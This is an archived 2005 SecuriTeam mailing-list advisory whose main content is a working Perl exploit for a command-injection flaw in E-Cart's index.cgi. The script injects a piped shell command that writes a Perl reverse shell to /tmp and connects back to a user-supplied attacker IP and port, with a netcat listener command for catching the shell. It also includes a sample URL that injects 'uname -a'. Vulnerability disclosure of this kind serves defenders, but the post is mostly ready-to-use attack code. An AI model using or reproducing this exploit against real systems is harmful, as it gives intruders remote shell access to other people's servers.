[EXPL] E-Cart index.cgi Command Execution (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/26/05

  • Next message: SecuriTeam: "[EXPL] Yager Buffer Overflow (Exploit)" 
    To: list@securiteam.com
Date: 26 Apr 2005 10:52:17 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      E-Cart index.cgi Command Execution (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    E-Cat contains a command execution vulnerability in its index.cgi allows
    remote attackers to cause the program to execute arbitrary code. The
    following exploit code can be used to test your E-Cart installation for
    the mentioned vulnerability.

    DETAILS

    Exploit:
    #!/usr/bin/perl
    #
    # Example added if code doesn't work for ya:
    #
    http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
    # /str0ke
    #
    #
    # info: emanuele@orvietolug.org
    #
    use IO::Socket;

    print "\n\n <http://foldoc.doc.ic.ac.uk/foldoc/foldoc.cgi?query=
    www.badroot.org > www.badroot.org \n\n";
    print " E-Cart E-Commerce Software index.cgi\n";
    print " Remote Command Execution Vulnerability\n";
    print " Affected version: <= E-Cart 2004 v1.1\n";
    print "
    http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0
    \n\n";
    print " <http://foldoc.doc.ic.ac.uk/foldoc/foldoc.cgi?query= code by z\\
    > code by z\\ \n\n\n";
    print " 04.23.2005\n\n\n";

    print "hostname: \n";
    chomp($server=<STDIN>);

    print "port: (default: 80)\n";
    chomp($port=<STDIN>);
    $port=80 if ($port =~/\D/ );
    $port=80 if ($port eq "" );

    print "path: (/cgi-bin/ecart/)\n";
    chomp($path=<STDIN>);

    print "your ip (for reverse connect): \n";
    chomp($ip=<STDIN>);

    print "your port (for reverse connect): \n";
    chomp($reverse=<STDIN>);

    print " \n\n";
    print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";

    print "[*] try to exploiting...\n";

    $string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";

    print "[*] OK! \n";
    print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";
    print "[*] starting connect back on $ip :$reverse\n";
    print "[*] DONE!\n";
    print "[*] Loock netcat windows and funny\n\n";
    $socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port,
    Proto => tcp)
    or die;

    print $socket "POST $path HTTP/1.1\n";
    print $socket "Host: $server\n";
    print $socket "Accept: */*\n";
    print $socket "User-Agent: 7330ecart\n";
    print $socket "Pragma: no-cache\n";
    print $socket "Cache-Control: no-cache\n";
    print $socket "Connection: close\n\n";

    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    print " WARNING - WARNING - WARNING - WARNING \r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
    print "If connect back shell not found:\n";
    print "- you do not have privileges to write in /tmp\n";
    print "- Shell not vulnerable\n\n\n";
    print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu
    us.ircnet.org\n\n\n";

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:emanuele@orvietolug.org>
    emanuele.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] Yager Buffer Overflow (Exploit)"

    Relevant Pages

    • [NEWS] Multi Vendor fd_set Structure Bitmap Array Index Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... fd_set is defined as a bitmask array with a socket number as an array ... One process per client model s for every client ... Model 1 is safe from this kind of vulnerability ...
      (Securiteam)
    • [UNIX] Linux Kernel scm_send Local DoS Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Linux kernel provides a powerful socket API to user applications. ... The socket layer uses several logical sub ... the auxiliary message layer ...
      (Securiteam)
    • [NT] Mollensoft Lightweight FTP Server CWD Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Mollensoft Lightweight FTP Server's support for the CWD command ... $socket or die "Cannot connect to host!\n"; ...
      (Securiteam)
    • [EXPL] Imail Buffer Overflow Exploit (RCPT TO)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Imail Buffer Overflow Exploit ... send $socket, $request, 0; ...
      (Securiteam)
    • [UNIX] Linux Kernel Setsockopt MCAST_MSFILTER Integer Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... An integer overflow has been found in the Linux kernel. ... The MCAST_MSFILTER socket option can be used on multicast ... Successful exploitation of this vulnerability allows a user to gain root ...
      (Securiteam)